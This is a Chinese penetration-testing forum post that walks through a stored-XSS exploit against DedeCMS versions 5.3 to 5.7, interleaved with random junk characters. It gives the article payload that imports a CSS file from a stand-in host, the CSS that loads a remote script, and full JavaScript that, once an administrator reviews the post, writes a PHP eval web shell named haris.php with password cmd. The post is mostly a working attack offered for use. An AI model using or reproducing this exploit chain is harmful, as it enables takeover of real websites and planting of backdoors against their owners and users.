中国网络渗透测试联盟
标题:
dedecms xss oday通杀所有版本 可getshell
[打印本页]
作者:
admin
时间:
2012-9-15 13:56
标题:
dedecms xss oday通杀所有版本 可getshell
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
$ Y% y4 I; `& t
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
$ k, Y7 v+ g; g
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
2 s% } j2 F; t9 ?) A' L- Y
下面说说利用方法。
3 @( y, v! q2 m" o& ?! _5 m
条件有2个:
: V: `3 p! k8 U& q$ x6 |# K
1.开启注册
& g8 u. ? S0 [" x& D
2.开启投稿
1 [' I" p% A1 A
注册会员----发表文章
3 ^/ b: S2 X" T8 g
内容填写:
8 u# ^1 O+ M. ?5 g( O
复制代码
3 q1 N3 t! H b! h
<style>@im\port'\
http://xxx.com/xss.css';
</style>
5 a; ]6 r! D u
新建XSS.Css
7 m m4 V4 D. @: b, S
复制代码
5 |% P5 ~1 d. K* @; R6 {. r# L, S' P
.body{
. `5 D: Z) T% X7 e
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
* b) ~" [ N: |1 [$ z3 _
新建xss.js 内容为
! N( v; d5 W3 j# p- @
复制代码
/ W7 Y' x! S4 M; G% y/ [
1.var request = false;
8 w; `1 I3 N+ v
2.if(window.XMLHttpRequest) {
3 J% _7 b9 w! P% n% ~
3.request = new XMLHttpRequest();
! i- b1 ~7 x6 k9 c2 o$ K
4.if(request.overrideMimeType) {
5 @' u2 T7 d9 b: `
5.request.overrideMimeType('text/xml');
, F* z' ?6 t; ]$ o4 a$ |
6.}
9 {) u7 u# ^9 n B7 Y6 P' n% N
7.} else if(window.ActiveXObject) {
3 r/ v) q) f6 K" ^1 H0 T) I! m- J; m
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
8 j8 A) H- q u# X& ~/ }
9.for(var i=0; i<versions.length; i++) {
6 y1 ] V/ a2 Y3 l
10.try {
8 k. j$ L9 u2 }4 _9 J8 \& d2 _1 W/ c2 ]
11.request = new ActiveXObject(versions);
9 `# o. S, Q; i! F, v9 R
12.} catch(e) {}
7 g: I# U2 j- F: z
13.}
$ a! U2 t$ p2 D6 E' g
14.}
+ B# m* L0 u- X9 E4 r9 E
15.xmlhttp=request;
: E0 i" r( f8 Z! [1 ~0 _
16.function getFolder( url ){
/ m1 l d0 d( X- n7 s
17. obj = url.split('/')
; M, F9 B! A/ ~
18. return obj[obj.length-2]
" o+ j& o/ n2 L5 x, R) H: f) \
19.}
( S' L% m+ M7 Q u, o9 }; Z# d! r
20.oUrl = top.location.href;
: v0 S, R& m6 C: L: h
21.u = getFolder(oUrl);
3 O0 t* m8 `3 ]: P
22.add_admin();
: W. Z* F7 O- e' a4 [ m
23.function add_admin(){
6 e/ `2 K! _ H& r0 A) l
24.var url= "/"+u+"/sys_sql_query.php";
9 k7 \1 P. M* S2 c8 ?; v# c
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
$ p: D- X7 M/ Z7 \9 O B2 e
26.xmlhttp.open("POST", url, true);
" B! X: H4 [1 h t/ o; i( \) w/ a( R
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
9 r5 K- {; D& t% v$ ^ a
28.xmlhttp.setRequestHeader("Content-length", params.length);
( T# R+ w2 R8 \% V$ j: t( w( C
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
7 V6 m" l% o, Q
30.xmlhttp.send(params);
, A3 m* y* Q) u) c
31.}
8 l* z$ ^" Q) J# {" c
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2